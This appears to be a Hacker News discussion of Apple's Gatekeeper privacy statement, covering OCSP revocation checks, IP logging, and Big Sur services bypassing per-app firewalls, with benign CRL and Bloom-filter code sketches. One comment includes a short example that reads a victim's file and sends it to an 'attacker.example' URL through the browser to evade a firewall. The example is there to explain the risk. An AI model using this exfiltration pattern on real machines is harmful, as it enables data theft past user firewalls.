macOS has been designed to keep users and their data safe while respecting their privacy.
Gatekeeper performs online checks to verify if an app contains known malware and whether the developer’s signing certificate is revoked. We have never combined data from these checks with information about Apple users or their devices. We do not use data from these checks to learn what individual users are launching or running on their devices.
Notarization checks if the app contains known malware using an encrypted connection that is resilient to server failures.
These security checks have never included the user’s Apple ID or the identity of their device. To further protect privacy, we have stopped logging IP addresses associated with Developer ID certificate checks, and we will ensure that any collected IP addresses are removed from logs.
In addition, over the next year we will introduce several changes to our security checks:
* A new encrypted protocol for Developer ID certificate revocation checks
* Strong protections against server failure
* A new preference for users to opt out of these security protections
Google or Facebook would not post this, because they would be combining the data. Instead, it would be some meaningless claim that they don’t use the data for advertising or don’t sell the data, leaving themselves free to do anything else with it (plus the “we can change the terms at any time” clauses).
I would argue it's because Google has to value security and privacy in a way Apple doesn't. Google has to build platforms instead of gardens, so there's an 'adversarial' incentive to make sure you're not held liable for a third party's actions.
Also, these incidents would be a thermonuclear event for search, due to the intimacy and inherent 'Internet-ness' of the data. Apple, by contrast, can get away with incidents like Intelligent Tracking Prevention: two years after it shipped, it turned out to be a globally unique identifier that also leaked your web history [1]. Yet, because Apple didn't have a perceived incentive to leak this information, people see it as a 'mere' competency issue and move on.
Nah, it’s because Google and Facebook earn their money with advertising, which runs on data. Apple, on the other hand, earns its money by selling hardware.
It’s a different value exchange, and Apple doesn’t really have a lot to gain by becoming a “bad actor” with data. See also, for example, their planned advertising tracking protections coming in 2021. They have little to lose in this area by protecting privacy, and a lot to gain.
I think that analysis is adequate for describing why Apple shouldn't be a bad actor with data, but they meet the criteria for one anyway: the security incidents of the past couple of years (the supercookie, the history leak, the root login bug, leaking app launches in plaintext...), assisting government access, softening E2E encryption to the point of being de facto unencrypted...
> If this was from Google or Facebook, there’d be an angry mob about how dare they log IPs in the first place.
Google and Facebook already do that. And of course with them there's no way to stop it either for most of their properties, as they're 100% web-based.
Plus, in the excerpt you're quoting, they say they stopped logging IP addresses for the Developer ID certificate checks. Logging those (and more) is par for the course in all kinds of debug environments (from MS, Oracle, etc.); that Apple no longer does it is probably impressive.
This IP logging might not even be legal under GDPR: Apple did not need the IP for the purpose of revoking a certificate, and it was shown that almost all users had no idea this even happened each time they launched an app. But the cherry on the cake is that none of this was encrypted, so even if users had accepted this stuff via the ToS dark pattern, they did not accept that this data would be visible to third parties.
A few years (or even months) ago this would have been considered a conspiracy theory; today it's just fine for most people because "think about my mother". I agree with secure-by-default, but don't forget that when Apple decides, or is "forced", to remove an application, you have no workaround on iOS. That "feature" will come to the laptop and desktop too if users don't demand otherwise and keep bringing up the mom argument.
There has been an angry mob. This week I learned (from HN) that because I prefer macOS I must be suffering from Stockholm syndrome, enabling technology dictatorships and generally bringing about the end of the world.
> A new encrypted protocol for Developer ID certificate revocation checks
Apple's online verification scheme still seems to be the wrong approach both for privacy (since it leaks information) and for security (since apps still need to keep working offline and during service outages). Encrypted queries can still leak information to observers, and we apparently still have to trust Apple to "remove" information from their logs (rather than simply not logging to begin with).
Dev certificate revocations are rare enough that they can be handled by periodic updates to an on-device revocation list. This is similar to what Chrome does with its CRLSet.
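A minimal sketch of that CRLSet-style approach, assuming a hypothetical publication URL and a plain gzipped JSON list of revoked serials (Chrome's real CRLSet format is more compact and more involved):

    # Hypothetical CRLSet-style flow: the vendor periodically publishes a
    # compressed list of revoked serials; launch-time checks are purely local.
    import gzip
    import json
    import urllib.request

    REVOCATION_LIST_URL = "https://example.com/devid-revocations.json.gz"  # hypothetical
    LOCAL_PATH = "/tmp/revoked-serials.json"

    def refresh_revocation_list() -> None:
        """Fetch the latest revocation list; run from a periodic background job."""
        with urllib.request.urlopen(REVOCATION_LIST_URL) as resp:
            data = gzip.decompress(resp.read())
        with open(LOCAL_PATH, "wb") as f:
            f.write(data)

    def is_revoked(serial: str) -> bool:
        """Offline check at app launch: no network traffic, no per-launch leak."""
        with open(LOCAL_PATH) as f:
            return serial in set(json.load(f))

The refresh can fail harmlessly (you just keep the last list you fetched), which is exactly the soft-fail property the launch-time online query lacked.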
I am still waiting for someone to provide a plausible explanation as to why it has to be an online check, rather than working like antivirus, where signatures are pushed to the client.
Instead, everything got derailed into "Apple data collection".
Let it be known: one asshole yelling on his personal blog can bully the largest company in the world into encrypting their shit and deleting their logs, and, most importantly, providing a way of turning it off.
Remember that, kids. I’m as surprised as you are.
Now I have an even bigger and more difficult writing task ahead of me: rms cold emailed me today to ask me, point blank (and presumably non-rhetorically), why I am still running macOS.
That’s going to be a doozy, because he’s damn well right.
Apple listens to bad PR, the problem is that you have to be lucky, competent, or gifted enough to get it. Otherwise you might as well pound sand.
As for RMS…well, the issue is that the way he lives is just exceedingly difficult to keep up with in modern society. That being said, you could instead be taking steps to improve yourself by using Linux; but perhaps there is a place in this world for people who slowly propose changes to macOS and make it better for millions of people, alongside those who shout for radical change immediately. Maybe you should probe for what he thinks you should do.
There was absolutely a whole lot of luck involved here, no doubt. It wouldn’t have been possible at all without HN, dhh, Louis Rossmann and many, many others boosting the signal.
I’m just thrilled that so many people care about privacy. I mostly assumed it was a lost cause, given the status quo on mobile (where basically every app launch notifies 3+ companies and data brokers, with no way to turn it off).
Oh, what I wouldn’t give for Apple to sherlock Little Snitch and port it to iOS! I’m going to assume that their Safari ad privacy backtracking for Facebook means that this probably won’t happen, though.
A good first step. What I would still like to see on top of this:
* An option to notify the user when a certificate gets revoked: a short, tweet-style description of why, a link to details, and a choice to quarantine the app or keep using it. This is similar in style to what antiviruses do when they tell you: 'this kind of malware was potentially found, but if we are wrong, feel free to remove it from quarantine'.
* The revocation list is checked locally on the machine twice a day, and remotely (the current way) twice a week, always on the same days, as a default that strikes a good balance. Allow the user to adjust the frequency; see the sketch after this list.
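Something like this toy sketch, where the interval constants and both callbacks are hypothetical and would be user-adjustable:

    # Toy scheduler for the proposed default cadence: cheap local checks
    # twice a day, a remote refresh twice a week. All names are hypothetical.
    import time

    LOCAL_CHECK_INTERVAL = 12 * 60 * 60                 # twice a day
    REMOTE_REFRESH_INTERVAL = int(3.5 * 24 * 60 * 60)   # twice a week

    def run_checker(check_local, refresh_remote):
        last_local = last_remote = 0.0
        while True:
            now = time.time()
            if now - last_remote >= REMOTE_REFRESH_INTERVAL:
                refresh_remote()   # e.g. fetch a fresh revocation list
                last_remote = now
            if now - last_local >= LOCAL_CHECK_INTERVAL:
                check_local()      # e.g. scan installed apps against the list
                last_local = now
            time.sleep(60)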
This should be added for literally every single "security" thing they've introduced since at least High Sierra. They've continually added features for improving system security that have proved to be major impediments to using a computer as a general-purpose computing device. A separate section (maybe under Security & Privacy; add loads of warnings, I don't care) with a deep dive allowing users to enable/disable the security features of macOS would be ideal.
The general taboo against asking users to disable any of the security protections of macOS needs to disappear, in my honest opinion. With Big Sur and Apple Silicon, I don't think it's hyperbole anymore to call macOS locked up, tailored towards casual users and dragging developers along in the process.
While it's good that they're going to improve Gatekeeper's certificate checks, don't forget the other major issue raised recently: all of Big Sur's system network traffic is deliberately leaked around VPNs.
Will they change course on that issue? Or will you have to carry a Raspberry Pi around as a hardware firewall if you want an actually private network connection? (Or, alternatively, not use a Mac.)
That is unbelievable. Breaking VPNs is literally a life-or-death situation for many journalists and activists in certain countries; not to mention something that would (justifiably) give network admins a heart attack.
It also increases the attack surface, as malicious programs may find ways to hijack the exempted traffic, or to attach their own traffic to OS traffic. All you need is an Apple service that relays the information somehow -- for example, a hypothetical Apple service that requests information/metadata from an application-specified URL.
Believe me, I won’t ever again use a Mac except through an external VPN router. I already needed to take that step for my iPad/iPhone and was putting it off. This sort of seals the deal, since all of the devices can use the same Wi-Fi device.
The 'malicious firewall bypass' is "lemme add a rule to bypass firewall, o gee, now I can bypass the firewall".
You can do this with any existing software firewall on any OS, here it just happens on a secondary whitelist (as opposed to the firewall configuration).
Right, but isn’t the issue then “I can trick a system service to do the malicious thing for me”? Apple’s apps are absolutely not secured against being convinced to make arbitrary outbound connections.
“I can trick a system service to do the malicious thing for me if I have root”, and that’s as designed, and something at least people on HN want (“I want control over what my hardware runs”)
If you have root, you can also remove Apple’s exceptions from that list. I haven’t checked, but that should fix the issue of Apple’s services bypassing firewalls.
I am very familiar with macOS's security features. Preventing an application from being maliciously commanded into sending things on the network is not one of the threat models Apple considers (or at least, they have no specific mitigations against it). As a simple (but conspicuous) example, consider an app exfiltrating information simply by opening a customized HTTP link, given that Safari is exempt from the firewall (a sketch follows below). There are hundreds of ways to do effectively the same thing more surreptitiously.
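A deliberately conspicuous sketch of that trick (the attacker URL is hypothetical; `open` is the standard macOS command for handing a URL to its default handler):

    # Ask the default browser to fetch a URL whose query string carries the
    # stolen data. If the browser is exempt from the per-app firewall, the
    # firewall never sees this traffic. The attacker URL is hypothetical.
    import subprocess
    import urllib.parse

    stolen = open("/Users/victim/secret.txt").read()
    url = "https://attacker.example/c?" + urllib.parse.urlencode({"d": stolen})
    subprocess.run(["open", url])  # macOS: opens in the default browser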
There are a million other ways to “convince” them when they are operating normally, which presumably these apps are not explicitly hardened/audited against.
That is false on current macOS. There have been many additional protections (rootless/SIP, SSV, the eradication of kexts) against uid=0 malware added to macOS over the last 5-6 years, and rightfully so.
Even unprivileged user apps can’t read and write to every file their POSIX permissions say they should be able to, due to things like ransomware. When apps want to read or write certain directories, an additional permission dialog is displayed.
I am not aware of any other desktop OS that implements these sorts of protections. How you describe it is definitely how it works on Linux and Windows.
It is unbelievable. It also appears to not be true.
System-level VPNs apparently continue to work as always. It's the new app-level APIs used by programs like Little Snitch that are bypassed by Apple services.
Journalists, activists, and really anyone using something they would rightly consider a VPN are fine, because system-level VPNs aren't bypassed.
The VPN leak only affects per-application VPNs and filters, which is the mechanism used by firewalls like Little Snitch and LuLu. These cannot be applied to Apple's apps.
System-wide VPNs thankfully don't have the same problem.
Can anyone weigh in on why Apple would prevent this? It's not as though redirecting the traffic from Apple's software will let you impersonate Apple (unless you've also been able to load your own fake certificates, in which case the client is already hosed). At worst you can selectively block them, no? And you can do that anyway with a hosts file.
This is in response to the issue last week where slowness of Apple's OCSP responders caused hangs in apps launching. It was a bad look for privacy-conscious Apple, especially considering that basic OCSP queries are unencrypted HTTP requests.
In my post (https://blog.cryptohack.org/macos-ocsp-disaster) I argued that OCSP was inherently a poor way to perform certificate revocation in this scenario, and that an approach based on Certificate Revocation Lists (CRLs) could be preferable. Regardless, it looks like Apple might be doubling down on OCSP but encrypting the requests, or possibly adding a new protocol altogether.
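For concreteness, here is roughly what one of those plaintext queries looks like when rebuilt with the pyca/cryptography library. The certificate file names are hypothetical; the endpoint is the ocsp.apple.com URL reported during the incident:

    # Build and send the kind of plain-HTTP OCSP query macOS issues for
    # Developer ID certificates. The PEM file names below are hypothetical.
    import urllib.request
    from cryptography import x509
    from cryptography.x509 import ocsp
    from cryptography.hazmat.primitives import hashes, serialization

    leaf = x509.load_pem_x509_certificate(open("developer_id.pem", "rb").read())
    issuer = x509.load_pem_x509_certificate(open("apple_intermediate.pem", "rb").read())

    req = ocsp.OCSPRequestBuilder().add_certificate(leaf, issuer, hashes.SHA1()).build()
    der = req.public_bytes(serialization.Encoding.DER)

    # Plain HTTP: the issuer hash and the leaf's serial number travel in the
    # clear, which is all an observer needs to infer whose app is launching.
    resp = urllib.request.urlopen(urllib.request.Request(
        "http://ocsp.apple.com/ocsp-devid01",
        data=der,
        headers={"Content-Type": "application/ocsp-request"},
    ))
    print(ocsp.load_der_ocsp_response(resp.read()).response_status)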
> But it’s also fundamentally different since Apple has total control over its own chain of trust. Other certificate authorities are not allowed to issue valid certificates for code signing as all certificates must chain back up to Apple.
To me this was the most curious part of the entire situation. The post briefly mentions CRLite and Bloom filters; they rely on a list of all (or at least most) valid certificates, which was impossible before CT, and it's understandable that they are not yet widely deployed. But Apple surely knows the list of all developer certificates and could simply publish a (probably compressed) list of serial IDs of revoked developer certificates that would otherwise be valid. I don't see a good reason to use big moving parts like OCSP here, especially given the soft-fail behavior.
Since Bloom filters allow for false positives, wouldn’t that make them inappropriate here? You wouldn’t want a valid certificate to be perceived as revoked. (I recognize that I’m probably wrong, given that Mozilla is doing this - where is my mistake in logic?)
Mozilla's solution to this is to run every single certificate in the CT log through the filter, and remedy any false positives with an extra layer. The filter also has a date attached, so potential false positives that are newer than the filter can be checked with OCSP.
That would be better than what we have here, though, where every application launch gets checked. The fallback with a Bloom filter is that you check a few apps, not all of them.
I think the idea is that false positives (cert revoked) result in a call home to Apple for an actual check.
The other idea is that because Apple knows all existing certificates, they could conceivably construct filters that have no false positives for those existing certificates... sort of like construction of a perfect hash.
You are misunderstanding. The bloom filter is only a preliminary check; if it indicates a revoked certificate, you then verify that it's a true positive the traditional way.
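A minimal sketch of that two-step scheme (filter sizing and the online fallback stub are illustrative, not Mozilla's or Apple's actual parameters):

    # Local bloom-filter precheck with an online fallback: a miss means
    # "definitely not revoked" and causes no network traffic at all.
    import hashlib

    class BloomFilter:
        def __init__(self, size_bits=1 << 20, num_hashes=7):
            self.size = size_bits
            self.num_hashes = num_hashes
            self.bits = bytearray(size_bits // 8)

        def _positions(self, item):
            # Derive k bit positions from salted SHA-256 digests of the item.
            for i in range(self.num_hashes):
                h = hashlib.sha256(i.to_bytes(4, "big") + item).digest()
                yield int.from_bytes(h[:8], "big") % self.size

        def add(self, item):
            for pos in self._positions(item):
                self.bits[pos // 8] |= 1 << (pos % 8)

        def might_contain(self, item):
            # False: definitely absent. True: present, or a false positive.
            return all(self.bits[pos // 8] & (1 << (pos % 8))
                       for pos in self._positions(item))

    def check_ocsp(serial):
        return False  # stub standing in for a real online revocation query

    revoked = BloomFilter()
    revoked.add(b"serial:1122334455")  # filter shipped periodically by the vendor

    def is_revoked(serial):
        if not revoked.might_contain(serial):
            return False           # definite miss: no query, no privacy leak
        return check_ocsp(serial)  # possible false positive: confirm online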
I really like this because of the increased privacy (Apple doesn't know which apps you run) as well as the better failure mode. If their servers go down, the worst that can happen is that an update of the revocation list fails, which means they can't get new revocations out to people. It's not that apps won't start anymore.
Seriously, why do they have to collect ANYTHING without opt-in? People pay them for hardware; their revenue stream has a different source than Facebook's or Google's.
I think it's fear (useful telemetry) or greed (valuable telemetry) or vanity (look how many people launch x).
Really, just do it. So some customers shoot themselves in the foot. That is how they learn. Others who are perfectly capable of managing things will also be happy with actual privacy. That is how trust is built up, and with trust comes unfettered trade.
Right now power users are alienated, regular customers feel deceived, and Apple could just do better.
While I'm a fan of having a choice (as I consider myself a "power user"), I do think Apple is making the right decision in making certain things (like this OCSP check) default-on. It is true that the overwhelming majority of Apple users won't ever know enough of the technical details to make an informed decision about this, nor should they need to know.
Where Apple went wrong, IMHO, is:
1) not giving people a way to opt out (not just for OCSP, but so many power user-hostile decisions they're making recently), and
2) programming it in a poor way where slow responses ground the machine to a halt (it did mine in the middle of the work day, stopping my work completely for 30-45 minutes).
I don't think malice (i.e. greed) was involved in how this whole thing turned out. As Hanlon's Razor states:
Never attribute to malice that which is adequately explained by incompetence.
They also did wrong by not encrypting the connection, and by not doing it in a privacy-preserving way, such as with a bloom filter precheck. This is a company with world-class cryptosystem designers on staff, remember. They know how to pcap a fresh install before the GM goes out the door, to see whether it's still speaking plain HTTP like OSes did back in the years before we ever heard the name Ed Snowden.
Cut them some slack, but not an infinite amount. They can and should well know better, and pledging to delete the logs, encrypt it, and add a knob to turn it off is as close to a “we fucked up” as you’ll ever get from them.
They aren’t collecting anything. This isn’t a telemetry feature. It’s more like antivirus. Before it lets an app run, it queries an online blocklist. Apple uses this to immediately shut down attacks on their customers. People who have been hit by ransomware and lose their entire digital life really do appreciate features like this.
Apple has a different, unrelated telemetry feature that is clearly labeled.
While everyone on HN (including me) is mad about the privacy implications of what's happening here, including how little good all this does for programmers dealing with all kinds of binaries updated daily, I quickly want to point out that I think this type of functionality is a great idea for most non-technical users. Apple has always been at the forefront of extreme usability (kids using iPads, seniors sending iMessages), and the internet has a lot of toxic stuff that needs to be kept away from many non-technical users. For my parents' computer, I'd rather have this ping home to Apple with hashes of the apps they open than have them exposed to tons of malware. That said, they really need to work on the privacy aspect.
"Apple has always been at the forefront of extreme usability (kids using iPads, seniors sending iMessages)"
I've always understood this to be a marketing victory on Apple's side. From what I've seen, using Mac/iOS isn't any easier or more difficult than Windows/Android.
I feel the complete opposite way. I’ve had to witness my grandfather’s Windows 10 laptop just be absolutely trashed by malware that used all the saddest tricks like fake “log in to Facebook” windows. It’s absolutely horrendous and in my opinion rather inevitable.
Is there even a single example anyone can point me to of this kind of borking happening to Macs?
I second this. Once I set up my mother with a Mac, all the support I was doing for basic things, like the WiFi not working or her PC being completely infected with viruses, went to zero. From then on I only helped her learn more about the programs she was using to create documents, look up stuff, send emails and messages, etc.
My parents (in their mid 60's) haven't had issues with this. Not saying your point isn't valid--just the one data point I have to draw from.
My relatives recently bought a Mac because they liked how it looked (big on interior design). They couldn't figure out how to navigate up a directory in Finder or access files from an external hard drive.
And yet when I tried Nexus tablets with all my elders, with Hangouts or Skype or whatever video call app was around then, they couldn’t figure it out.
As soon as I gave them all iPad minis and iPhones, they all found it easier to FaceTime.
Although, in my opinion, the chat issue was solved by WhatsApp: by requiring phone numbers it reduced the need for passwords and cut down spam, greatly simplifying chat for the less tech-literate and English-literate members of my family.
In my extended family, WhatsApp is used for chatting and calling by the 4-90 age group quite easily and successfully. For a lot of people, WhatsApp and YouTube are the internet.
FWIW, I do think Apple is targeting non-techies a lot, and really not caring much about tech users.
The developer experience on Apple tech is pretty bad and getting worse -- but for the other 99% of the people, Apple seems to be the best tool for them.
For me, the fact that they are working on improvements (including the ability to disable these checks) is a reason to take Apple devices into consideration again.
I've been soured by this whole episode, tbh (and I'm big on the Apple ecosystem). I'm gonna hold off until there's a communication about Apple services in Big Sur bypassing firewalls and VPNs.
The principle here is good (check if the developer’s certificate is revoked) but the implementation is completely batshit. Why not cache the result and send a push notification through the centralized channels if there is a Sev1 revocation incident?
This is a really good point: there is no good reason to have millions of devices phone home for permission on every single app open. If Apple's claim is to be believed, there are a million patterns that make more sense for achieving this goal: blacklists, whitelists, caching, etc.
I get "never attribute to malice what can be explained by incompetence", but this is Apple. Are we to believe that this public, unencrypted endpoint was set up and is being called tens of millions of times a day because Apple engineers were too incompetent to come up with a better solution for something so fundamental (to Apple) as the security of the software running on their devices? And flying so blatantly in the face of their claim to protect user privacy?
This whole incident is completely bonkers. People should be getting fired over this and there should be an apology and a massive step back from this horrible, horrible approach.
This article by Jacopo Jannone refutes the notion that macOS sends an application's hash to Apple "on every single app open": https://blog.jacopo.io/en/post/apple-ocsp/
Also, per that article, the OCSP protocol is supposed to go over HTTP rather than HTTPS: "If you used HTTPS for checking a certificate with OCSP then you would need to also check the certificate for the HTTPS connection using OCSP."
Furthermore, the returned information apparently includes a timeout period for the result to be cached at the endpoint, and according to Jeff Johnson, Apple has raised that timeout in the wake of Thursday's incident from 5 minutes to 12 hours: https://lapcatsoftware.com/articles/ocsp.html
There's certainly room to argue about Apple's approach, but let's make sure we're arguing about the actual behavior.
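For illustration, the client-side caching described above amounts to something like this (the query function is a stub, and the 12-hour default mirrors the figure reported in the linked article):

    # Cache OCSP verdicts for the advertised validity window so repeated app
    # launches don't trigger repeated network queries.
    import time

    _cache = {}  # serial -> (revoked?, expiry timestamp)

    def query_ocsp(serial):
        return False  # stub standing in for the real OCSP query

    def check_revoked(serial, ttl_seconds=12 * 60 * 60):
        now = time.time()
        if serial in _cache and _cache[serial][1] > now:
            return _cache[serial][0]       # fresh cached verdict, no network
        revoked = query_ocsp(serial)
        _cache[serial] = (revoked, now + ttl_seconds)
        return revoked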
The protocol in use is OCSP. The OCSP endpoint is part of the certificate. If I had to guess, I would say that they just relied on certificate validation features of the library they are using, not necessarily aware of all of the consequences.
Checking OCSP is a standard feature of many SSL libraries.
Doing what you suggest would be an implementation outside of what standard libraries provide, and was probably completely out of scope until now, when stuff started burning.
Don't call relying on standard features of an underlying library a "batshit implementation". In the vast majority of cases, going with what's already there is a far better solution than NIHing your own custom thing.
To be fair, they fully control the library they’re using, as they have their own X.509 library and API in Core Foundation. But it also supports CRLs, so I’m somewhat skeptical that this is the reason.
More likely it’s the server side: CRLs have fallen out of popularity because they don’t work well for the scope of most CAs. On the web OCSP doesn’t have the drawbacks it does in this situation because servers themselves can staple OCSP responses instead of forcing the client to fetch them itself. Obviously the same doesn’t quite work for binaries sitting on a user’s disk.
> To be fair, they fully control the library they’re using, as they have their own X.509 library and API in Core Foundation. But it also supports CRLs, so I’m somewhat skeptical that this is the reason.
Yes, if it is indeed their library. But I assume the caller was just calling some (imaginary) function like
validate_cert(cert, ENABLE_ALL_CHECKS);
and that was it.
That ENABLE_ALL_CHECKS would then go out and query the OCSP server was probably not immediately known, or was just seen as part of, well, enabling all checks, without much additional thought.
Whether the certificate also lists a CRL endpoint, and whether that imaginary ENABLE_ALL_CHECKS checks it too, I don't know; but possibly neither did the person who called that (imaginary) function.
Heck, the function might even default to ENABLE_ALL_CHECKS internally at which point the author of this code in question might not even have been aware of the network calls.
> The principle here is good (check if the developer’s certificate is revoked)
How is that remotely good? It makes it easy to bully or blackmail a developer into bowing to Apple's every wish, with a certificate revoked in pure retaliation; cf. the Epic debacle. A central authority can't be trusted.